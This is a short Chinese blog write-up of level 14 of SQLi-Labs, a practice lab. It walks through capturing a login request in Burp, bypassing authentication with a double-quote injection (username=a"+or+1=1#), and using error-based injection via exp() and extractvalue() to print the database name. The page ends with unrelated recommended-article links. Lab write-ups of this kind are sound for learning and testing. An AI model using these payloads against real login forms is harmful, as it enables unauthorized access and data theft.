sqllab第十四关通关笔记

知识点:

  • 错误注入
  • 这里的语法是 where username=""
  • 直接进行双引号绕过

通过admin admin登录发现还是没有任何回显

通过bp进行抓包;测试输入内容

构造payload:username=a'+or+1=1#

发现不能成功登录

尝试换成双引号

构造payload:username=a"+or+1=1#

成功登录了

尝试进行错误注入

构造payload:username=a"+or+exp(710)#

错误成功打印到页面上了

尝试利用错误注入获取数据库名

构造payload:username=a"+or+extractvalue(1,concat(0x7e,database(),0x7e))#

成功获取了数据库名

到这里就结束了,利用错误注入获取数据库中其他敏感信息在最开始的几关实验过了

10

相关推荐
碎叶城李白43 分钟前
若依学习笔记1-validated
java·笔记·学习·validated
HuashuiMu花水木3 小时前
PyTorch笔记1----------Tensor(张量):基本概念、创建、属性、算数运算
人工智能·pytorch·笔记
笑衬人心。5 小时前
Ubuntu 22.04 修改默认 Python 版本为 Python3 笔记
笔记·python·ubuntu
金色光环5 小时前
【Modbus学习笔记】stm32实现Modbus
笔记·stm32·学习
zyxzyx6666 小时前
Flyway 介绍以及与 Spring Boot 集成指南
spring boot·笔记
西岭千秋雪_8 小时前
Redis性能优化
数据库·redis·笔记·学习·缓存·性能优化
HuashuiMu花水木9 小时前
Matplotlib笔记4----------图像处理
图像处理·笔记·matplotlib
DES 仿真实践家10 小时前
【Day 11-N22】Python类(3)——Python的继承性、多继承、方法重写
开发语言·笔记·python
IMPYLH16 小时前
Python 的内置函数 reversed
笔记·python
ysa05103019 小时前
数论基础知识和模板
数据结构·c++·笔记·算法